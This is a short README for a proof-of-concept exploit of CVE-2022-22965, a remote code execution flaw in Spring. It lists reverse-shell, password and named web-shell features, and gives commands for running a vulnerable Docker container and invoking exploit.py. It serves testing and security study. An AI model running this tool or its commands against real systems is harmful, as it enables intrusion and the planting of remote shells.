CVE-2022-22965 poc
CVE-2022-22965 poc including reverse-shell and password support. Feel free to add more stuff ?
How to test?
$ docker run -p 9090:8080 vulfocus/spring-core-rce-2022-03-29 # run vulnerable docker
$ python3 exploit.py -c id --password 1234 --shell_name big0us
$ python3 exploit.py --help # for more usages
Creditis
I refactored the code of the original exploit and add some features
Changes
- reverse shell suport
- password support
- shell name support